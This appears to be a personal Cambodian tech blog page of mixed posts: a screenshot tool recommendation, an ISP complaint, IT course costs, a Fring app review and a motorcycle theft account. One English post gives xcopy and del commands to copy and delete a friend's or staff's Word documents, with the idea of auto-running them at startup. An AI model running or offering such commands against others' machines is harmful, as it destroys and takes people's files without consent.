Best free screenshot tool for Windows XP

Greenshot – a free screenshot tool optimized for productivity

Greenshot is a light-weight screenshot software tool for Windows with the following key features:

Quickly create screenshots of a selected region, window or fullscreen; you can even capture complete (scrolling) web pages from Internet Explorer. Easily annotate, highlight or obfuscate parts of the screenshot. Export the screenshot in various ways: save to file, send to printer, copy to clipboard, attach to e-mail, send Office programs or upload to photo sites like Flickr or Picasa, and others. …and a lot more options simplyfying creation of and work with screenshots every day.

Being easy to understand and configurable, Greenshot is an efficient tool for project managers, software developers, technical writers, testers and anyone else creating screenshots.

Download

Advertisements

វិធីអា “ក” យក​លុយ​របស់​ក្រុម​ហ៊ុន Online

មិតភក្តិខ្ញុំ ប្រើ Internet ក្រុមហ៊ុន Online ល្បឿន 1mbps ។ ពេលចុះឈ្មោះប្រើប្រាស់ដំបូង គាត់មិនបានមើលកុងត្រាច្បាស់លាស់ទេ ដោយសារគាត់ជាជនជាតិចិន ដែលនៅក្នុងកុងត្រាគឺចុះឈ្មោះប្រើ Internet រយះពេល មួយឆ្នាំ និងកក់លុយចំនួន 100$ ។

Image

ពេលនេះគាត់ប្រើទើបតែបាន 7  ខែ ហើយចង់ឈប់ប្រើ, ពេលទូរស័ព្ទទៅក្រុមហ៊ុន គេអោយគាត់ទៅបំពេញបែបបទសុំផ្តាច់ ហើយក្រុមហ៊ុនក៏បានប្រាប់វិញថា លុយកក់មិនអាចអោយវិញបានទេ ហើយត្រូវពិន័យប្រាក់ 300$ បន្ថែមបើចង់ផ្តាច់ពេលណ្នឹង!

តើនេះជាលក្ឋ័ន្ធដែលគួរអោយគោរព និងត្រឹមត្រូវដែរឬទេ???? លុយកក់មិនបានវាជារឿងត្រឹមត្រូវ តែពិន័យ 300$ គឺជារឿងដ៏ថោកទៀបបំផុតសម្រាប់ខួរក្បាលខ្ញុំ។ 

គាត់គ្មានជំរើស និងមិនចង់ប្រឆាំងនឹងកុងត្រាអាករយកលុយរបស់ Online, គាត់មានតែទ្រាំប្រើ Internet Unlimited, Speed 1Mbps, Optic cable, ពេល Download ជាក់ស្តែងបានតែ 70 – 80 Kbps…. ណ្នឹងទៀតទៅ។

Online, You will have no customers, If you still using your current customer service center ( 023 72 72 72 ) and continue using your current contract in Cambodia!!!

One Click Copy and Delete any Type of Documents

Command line is  very simple. but it very useful for network administrator to perform and fast and reliable tasks in one click.  I’ll show you a quick simple command line in Microsoft Windows to copy any type of documents and delete the source files, here we can say one click still all of your friends’s document using command line.

To start command line, go to start > run and type ” cmd ”

xcopy d:\*.doc /s /h f:\

del d:\*.doc /f /s /q

The above command line will copy all Ms. Word documents from your friend’s D drive to F drive and delete.

To make is simply, just open notepad copy and paste the above command and save it as batch file (.bat). For best real world, I use this command to cut all staff’s files like .mp3, .mp4,… or something else.  Sometime it become more useful if you set it automatically start when windows starting up.

To learn more about windows command line, just type the syntax with /? (ex: xcopy /?)

មានលទ្ធភាពរៀន​សញ្ញាប័ត្រ​បរទេស​ដែរ​ឬទេ?

ដើរ​ចេញពីផ្ទះយូរព្រោះរវល់​ពេក ថ្ងៃនេះទ្រាំមិនបាន​ទេបើ​មិនបាន​ទំលាយ​វាចេញមក!!!

ចុះវិស័យអប់រំឯកជននៅកម្ពុជាកំពុងតែ​ត្រូវ​បាន​ត្រួត​ពិនិត្យ និង​រៀបចំដោយ​អ្នក​ណា ? វិទ្យាស្ថាន, សាកលវិទ្យាល័យ​, មជ្ឍមណ្ឌលបណ្តុះបណ្តាលដែលកំពុង​រីក​ដុះដាល​ដូចផ្សិត​នៅក្រុង​ភ្នំពេញ តើគេកំពុង​សម្លឹង​មើលអតិបរិមានៃការ​ដាក់​តម្លៃសិក្សាលើនិស្សិត​ខ្មែរដល់​កំរិត​ណាទៅ?

នៅស្រុក​គេក្មេងៗមាន​ចំណេះដឹង​ IT តាំងពីក្មេងៗ ប្រាក់​ចំណូលក៏ខ្ពស់ មធ្យោបាយ​នៃការ​រៀនសូត្រងាយស្រួល​ និង​បរិយាកាស​នៃការ​អនុវត្តន៏ក៏ទូលំទូលាយ ហេតុដូច្នេះហើយ បាន​ជា​សាលាយក​តម្លៃថ្លៃ។ វគ្គសិក្សា​ទាំងនោះមានដូចជា  ( Microsoft Training Course, CISCO, Linux ,……) បាន​ហូរ​ចូល​មក​ស្រុក​ខ្មែរ​ ​បើក​ចំហរយ៉ាងគគ្រឹកគគ្រេង តើ​អ្នក​ទាំងនោះ​មានធ្លាប់​​គិត​ដល់​ សម្ថតភាព និង​លទ្ធភាព​របស់​និស្សិត​នៅកម្ពុជា​ដែរ​ឬទេ???

ខ្ញុំទទួលស្គាល់​ថា​វាជា សញ្ញាប័ត្រ​ទទួល​ស្គាល់​ជា​អន្តរជាតិ ប៉ុន្តែអ្នកទាំងអស់​គ្នា​គួរ​គិត​ដល់​ភាពខុស​គ្នា​រវាង​និស្សិត​ស្រុក​ខ្មែរ និង​និស្សិត​បរទេស​ផង!!! ចំណេះដឹង បទពិសោធន៍ និង​ធនធាន(លុយ) សម្រាប់​និស្សិត​ខ្មែរ​យើងមិនទាន់​គ្រប់​គ្រាន់​នឹង​រៀនស្មើរ​នឹង​ពួក​បរទេស​ទេ។

ថ្វីត្បិត​ស្រុក​យើង​​កំពុង​តែ​រីក​ចម្រើន និង​កំពុងត្រូវ​ការ​អ្នក​ចេះផ្នែក​ទាំងនោះ​ច្រើន​យ៉ាង​ណា​ក៏​ដោយ ខ្ញុំសូម​និយាយថា ការ​ចំណាយ​ក្នុង​ការ​រៀនយក​សញ្ញាប័ត្រទាំងនោះ និង​ចំណូល​ការ​ងារ​បន្ទាប់​ពីរៀន​ហើយ មិន​ទាន់​សមមាត​គ្នា​ទេ។

Training Source:

http://netitraining.com/?nav=courses

http://www.sunriseinformatics.com/upcoming.php?upcomingid=37693cfc748049e45d87b8c7d8b9aacd#

http://www.yejj.com/training/

 

Fring ជាកម្មវិធី Call Video ល្អបំផុតសម្រាប់​ទូរស័ព្ទ Android

កម្មវិធីសម្រាប់​ Chat , Voice Call ឬ Video Call សម្រាប់​ទូរស័ព្ទដៃមានច្រើនដូចជា Fring, Skype, Tango, Yahoo…. តែឆ្លងតាម​បទពិសោធន៍​លើ​ការប្រើ​ប្រាស់​កម្មវិធីទាំងនោះនៅលើទូរស័ព្ទ Android ខ្ញុំសង្កេត​ឃើញថា​ Fring គឺជាកម្មវិធីដែលល្អជាង​គេ។ ចំណុចល្អបំផុត​របស់ Fring ទាំង​ការ Chat, Voice Call ឬ Video Call គឺវា​លឿន!

កំហុស​ឆ្គងមួយធំ ដែលតែងតែកើត​មាន​នៅក្មុង​កម្មវិធីផ្សេង​ៗដូចជា Skype,  Yahoo, Tango…

-នៅពេលដៃគូរម្ខាង​កំពុង online , ភ្លាម​នោះគេក៏​ដាច់ Internet ឬបិទកម្មវិធីនោះចេញ, ជាធម្មតា​យើង​នឹងឃើញ Contact ម្នាក់​នោះ Offline តែបែរ​ជាបង្ហាញ online ដដែល, មិនត្រឹមតែប៉ុណ្ណោះថែមទាំងអាច​ចុច Chat, ឬ Call បាន​ទៀត​ផង តែធាតុពិត​ដៃ​គូរម្ខាង​ទៀត​មិនដឹង​ទៅដល់​ណាបាត់​ទៅហើយ។

និយាយមកកម្មវិធី Fring វិញគឺ​មិនមានបញ្ហាខាង​លើ​ទេ! ចំណុច​ពិសេស​របស់​ Fring គឺយើង​អាច​ online សេវាកម្មផ្សេងៗក្នុង​ពេលតែមួយ​បានដូចជា Yahoo, Google , Live…. ថែម​ទៀត​ផង (បានតែ Chat ប៉ុណ្ណោះ)។

ដើម្បីដំឡើង Fring នៅក្នុង​ Android គឺគ្រាន់តែចូលក្នុង​កម្មវិធី Market > Search > Fring ។

អានបន្ថែម

សកម្មភាពចោរ​លួច​ម៉ូតូពីកន្លែង​ធ្វើ​ការ​ខ្ញុំ​បាន​ដោយ​សុវត្ថិភាព

ម្សិល​មិញ​ម៉ោង​ប្រហែលជា ៩ ព្រឹក​ អ្នក​កន្លែងធ្វើ​ការ​គេ​បាន​ទូរស័ព្ទ​មក​ប្រាប់​ថា មាន​ចោរ​លួច​ម៉ូតូ​គ្នា​យើង​ទៅ មួយ​ហើយ សូម​មក​ជួយ​បើក​មើល​មុខ​អា​ចោរ​នោះតិច​មើល! ពេល​មក​ដល់​បើក​មើល​គឺបានត្រឹម​តែឃើញ​រូបរាង​ និង​ភិន​ភាគតែប៉ុណ្នោះ ចំណែក​មុខ​មាត់​ចោរ​មើល​មិន​សូវ​ច្បាស់​ទេ។ ប៉ុន្តែ​​បើ​យើង​ជួប​ចោរ​នោះនៅកន្លែង​ណា​មួយ​ប្រាកដ​ជា​ចំណាំបាន​ជាមិនខាន ! កុំអាលអរ​អា​ចោរ!

របៀប​នៃការ​លួច​របស់​ចោរ:

ដំបូង​ម្ចាស់​ម៉ូតូ​ បាន​មកឈប់​មុខ​ហាងថត​រូប SPK Fuji  ហើយ​និយាយ​ទូរស័ព្ទនៅជិត​ម៉ូតូ​ជិត​ ១០​នាទី ទើប​ដើរ​ចូលក្នុង​ហាងដើម្បីធ្វើ​ការ​ងារ​ខ្លួន ។ ស្រប​ពេល​ដែល​ដើរ​ចូល​មិន​ទាន់​បាន ២នាទីផង ស្រាប់​តែមាន​ជន​ម្នាក់​កំពស់​ប្រហែលជា 1.65 ពាក់​អាវ​យឺតពណ៌ខោវ ស្លោក​ខោរ​ជើង​វែង​ពណ៌រាង​ក្រម៉ៅ​ ពាក់​ស្បែកជើង​ប៊ូ សក់​ក្បាលរួញ​ៗខ្លី ក្បាលឆក​សង​ខាង បាន​ដើរ​ចូល​មុខ​ជិត​ដល់​ក្នុង​ហាង ។

បន្ទាប់​មក​វា​ធ្វើ​ជាដក​ទូរស័ព្ទមក​និយាយ ហើយ​ដើរ​ចុះដើរ​ឡើង​ រួច​ក៏​សំដៅទៅជិត​ម៉ូតូសង់​ ០៥​នោះ។

មិន​បង្អង់​យូរ​ ចោរ​ក៏​ចាប់​ទាញ​ម៉ូតូ​ចេញ​មកខាង​ក្រៅ​ ដើម្បីងាយ​ស្រួល​កាច់​សោរ​-ក។ រួច​​ក៏​ធ្វើ​ជា​អង្គុយ​លើ​ម៉ូតូ​មើល​លិច​មើល​កើត ហើយ​ក៏​លូក​ហោបៅទាញ យក​ប្រដាប់​កាច់​សោរ​-ក​ មកចាក់​ចូល​សោរ​រួច​ប្រើ​ដៃ​ទាំងពីរ​កាច់​បំបាក់​សោរ​តែ​មួយ​ពព្រិចភ្នែក​តែប៉ុណ្នោះ។

ក្រោយ​ពីកាច់​សោរ​-ក ​វាក៏ដើរ​ចេញពី​ម៉ូតូបន្តិច​ ដើម្បីកុំអោយ​គេ​សង្ស័យ រួច​ក៏​បក​មកអង្គុយ​លើម៉ូតូវិញ ពាក់ក​មួក​សុវត្ថិភាព​ដែល​មាន​ស្រាប់​ ហើយ​ដេរបញ្ឆេះ​ជិះចេញ​ទៅខាង​ស្តាំ (ទៅផ្សាថ្មី) ប្រុយ​!

ខាង​ក្រោម​ជា​វីដេអូរនៃការ​លួច​ម៉ូតូ​ដែលចាប់​បានដោយ​កាម៉េរ៉ា​ខាង​មុខ​ហាង​ SPK ថត​រូប​ ផ្លូវ​មុន្នីវង្ស​ ជិត​វត្តកោះ។

ក្រោយ​ពីមើល​ហើយ ខ្ញុំ​មាន​តែពាក្យ​ដល់​ប្រជាពលរដ្ឋទាំងអស់​មេត្តា​យក​ចិត្ត​ទុក​ដាក់ និង​ប្រុង​ប្រយ័ត្នន​ខ្ពស់លើ​សម្បត្តិ​ទ្រព្យ​របស់​ខ្លួន​គ្រប់​ពេល​វេលា។​ ខ្ញុំសង្ឃឹម​ថា​ប៉ូលិស​និង​អាច​កំណត់​មុខ​សញ្ញា​ចោរ​បាន បន្ទាប់​ពីមើល​វីដេអូរ​សកម្មភាពនេះហើយ។